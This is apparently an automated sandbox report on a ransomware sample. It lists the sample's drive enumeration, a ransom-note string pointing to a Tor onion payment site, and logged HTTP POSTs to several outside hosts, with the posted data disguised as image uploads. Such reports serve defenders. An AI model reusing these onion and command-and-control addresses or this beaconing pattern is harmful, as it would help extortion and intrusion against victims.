Source:	Binary string: \\?\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: RQzHm5vLxs.exe, 00000000.00000003.2216942802.0000000003BE6000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2211386957.0000000003BE9000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2344505998.0000000003BEA000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2215318961.0000000003BE3000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2928315056.0000000003BEA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \\?\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\T source: RQzHm5vLxs.exe, 00000000.00000003.2156041172.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2153761267.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2216977253.0000000002589000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2158945262.0000000002583000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2344713671.0000000002589000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \\?\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\g5 source: RQzHm5vLxs.exe, 00000000.00000003.2162546986.0000000003B89000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: z:	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: x:	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: v:	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: t:	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: r:	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: p:	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: n:	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: l:	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: j:	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: h:	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: f:	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: b:	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: y:	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: w:	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: u:	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: s:	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: q:	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: o:	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: m:	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: k:	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: i:	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: g:	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: e:	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: c:	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: a:	Jump to behavior

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

Code function: 0_2_00D961AD FindFirstFileW,FindNextFileW,FindClose,

0_2_00D961AD

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: C:\Windows\WinSxS\	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: C:\Windows\WinSxS\Backup\amd64_microsoft-client-li..m-service.resources_31bf3856ad364e35_10.0.19041.1865_en-us_b6d4cf229ed6dfa6.manifest	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: C:\Windows\WinSxS\Backup\amd64_hid-user.resources_31bf3856ad364e35_10.0.19041.1_en-gb_140ae2618f6740b3_hidserv.dll.mui_561adfc8	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: C:\Windows\WinSxS\Backup\	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: C:\Windows\WinSxS\Backup\amd64_microsoft-client-li..keyhelper.resources_31bf3856ad364e35_10.0.19041.1_en-us_a9723a608a71b1eb.manifest	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File opened: C:\Windows\WinSxS\Backup\amd64_hid-user.resources_31bf3856ad364e35_10.0.19041.1_en-gb_140ae2618f6740b3.manifest	Jump to behavior

Networking

Found Tor onion address

Source: RQzHm5vLxs.exe, 00000000.00000003.2146778356.0000000002507000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: RQzHm5vLxs.exe, 00000000.00000003.1665541859.0000000002520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
Source: RQzHm5vLxs.exe, 00000000.00000003.2052588010.0000000002507000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: RQzHm5vLxs.exe, 00000000.00000003.2113111290.0000000002507000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: RQzHm5vLxs.exe, 00000000.00000003.1922030335.0000000002520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: RQzHm5vLxs.exe, 00000000.00000003.1922100187.0000000002509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: RQzHm5vLxs.exe, 00000000.00000003.1921990735.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: RQzHm5vLxs.exe, 00000000.00000003.2215006732.0000000002507000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: RQzHm5vLxs.exe, 00000000.00000003.2062978982.0000000002507000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: RQzHm5vLxs.exe, 00000000.00000002.2926971200.0000000002507000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: RQzHm5vLxs.exe, 00000000.00000003.2146982196.0000000002509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: RQzHm5vLxs.exe, 00000000.00000003.1665524743.0000000002510000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
Source: RQzHm5vLxs.exe, 00000000.00000003.1921931735.0000000002522000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
Source: 985drm9-readme.txt17.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt13.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt28.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt10.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt51.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt39.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt42.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt61.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt30.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt47.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt31.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt27.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt59.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt60.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt36.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt64.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt43.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt3.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt63.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt1.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt62.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt11.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt54.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt4.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt34.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt22.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt35.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt48.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt38.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt23.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt19.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt21.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt8.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt16.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt2.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt6.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt57.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt14.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt66.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt25.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt58.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt56.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt26.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt50.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt46.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt7.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt5.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt67.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt24.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt55.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt18.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt40.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt65.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt49.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt44.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt32.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt15.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt52.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt41.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt37.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt0.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt12.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt68.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt9.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt29.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt20.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt45.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt33.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
Source: 985drm9-readme.txt53.0.dr	String found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606

Posts data to a JPG file (protocol mismatch)

Source: unknown

HTTP traffic detected: POST /admin/graphic/ervzot.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 870Host: patriotcleaning.net

Source: Joe Sandbox View	ASN Name: OVHFR OVHFR
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /data/image/oe.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 870Host: p-ride.live
Source: global traffic	HTTP traffic detected: POST /static/assets/hbhezx.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 870Host: avtoboss163.ru
Source: global traffic	HTTP traffic detected: POST /admin/pics/hdxsmg.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 870Host: brownswoodblog.com
Source: global traffic	HTTP traffic detected: POST /admin/graphic/ervzot.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 870Host: patriotcleaning.net
Source: global traffic	HTTP traffic detected: POST /news/game/bvprbb.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 870Host: so-sage.fr

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginxdate: Thu, 16 Nov 2023 23:51:58 GMTcontent-type: text/html; charset=UTF-8transfer-encoding: chunkedvary: Accept-Encodingx-unique-id: 9C9231A8:A25E_B920398E:01BB_6556AB1D3AB377C082set-cookie: stats=1; expires=Thu, 23-Nov-2023 23:51:58 GMT; Max-Age=604800; path=/; domain=avtoboss163.rustrict-transport-security: max-age=10x-reason: no_rendervary: Cookiepragma: no-cachelast-modified: Thu, 16 Nov 2023 21:49:18 GMTcache-control: must-revalidate, max-age=0expires: Thu, 16 Nov 2023 21:49:18 GMTx-xss-protection: 1; mode=blockconnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.21.6Date: Thu, 16 Nov 2023 23:52:01 GMTContent-Type: text/htmlContent-Length: 150Connection: closeVary: Accept-EncodingSet-Cookie: _uid=CgE5FmVWqyE3lQA/JZtvAg==; expires=Fri, 17-Nov-23 23:52:01 GMT; path=/Strict-Transport-Security: max-age=31536000
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 16 Nov 2023 23:52:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.so-sage.fr/wp-json/>; rel="https://api.w.org/"

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: RQzHm5vLxs.exe, 00000000.00000003.1665541859.0000000002520000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1665524743.0000000002510000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1921931735.0000000002522000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/
Source: RQzHm5vLxs.exe, 00000000.00000003.2146778356.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052588010.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2113111290.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1922030335.0000000002520000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1922100187.0000000002509000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1921990735.0000000002515000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2215006732.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2062978982.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2926971200.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2146982196.0000000002509000.00000004.00000020.00020000.00000000.sdmp, 985drm9-readme.txt17.0.dr, 985drm9-readme.txt13.0.dr, 985drm9-readme.txt28.0.dr, 985drm9-readme.txt10.0.dr, 985drm9-readme.txt51.0.dr, 985drm9-readme.txt39.0.dr, 985drm9-readme.txt42.0.dr, 985drm9-readme.txt61.0.dr, 985drm9-readme.txt30.0.dr, 985drm9-readme.txt47.0.dr, 985drm9-readme.txt31.0.dr	String found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
